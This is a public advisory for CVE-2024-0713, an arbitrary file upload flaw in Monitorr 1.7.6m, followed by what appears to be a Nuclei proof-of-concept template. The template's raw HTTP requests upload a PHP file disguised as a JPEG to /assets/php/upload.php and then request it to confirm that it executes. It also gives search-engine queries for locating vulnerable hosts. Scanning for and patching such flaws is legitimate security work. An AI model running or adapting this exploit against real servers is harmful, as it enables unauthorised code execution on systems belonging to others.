A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
PoC代码[已公开]
id: CVE-2024-0713
info:
name: Monitorr Services Configuration - Arbitrary File Upload
author: DhiyaneshDK
severity: high
description: |
A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
reference:
- https://github.com/Tropinene/Yscanner
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-0713
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2024-0713
cwe-id: CWE-434
epss-score: 0.00061
epss-percentile: 0.2356
cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: monitorr
product: monitorr
shodan-query: http.favicon.hash:"-211006074"
fofa-query: "icon_hash=\"-211006074\""
tags: cve,cve2024,file-upload,intrusive,monitorr
variables:
file: "{{to_lower(rand_text_alpha(5))}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /assets/php/upload.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaquxwjsn
------WebKitFormBoundaryaquxwjsn
Content-Disposition: form-data; name="fileToUpload"; filename="{{file}}.php"
Content-Type: image/jpeg
{{base64_decode('/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAABAAEDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD5/ooooA//2Tw/cGhwIGVjaG8gJ3h4eHh4eGF0ZmVyc290Zyc7Pz4=')}}
------WebKitFormBoundaryaquxwjsn--
matchers:
- type: word
part: body
internal: true
words:
- "has been uploaded to:"
- raw:
- |
GET /assets/data/usrimg/{{file}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "atfersotg"
- type: status
status:
- 200
# digest: 490a0046304402204750d427ea44f6f9a9a117c70f83393a9fcaa21c4b5fe4b7c1d2306540d1b53c0220191d75f5bd47157776297ea14d82aeaa567cfe770bbc3fbe726c428bbc06e983:922c64590222798bb761d5b6d8e72950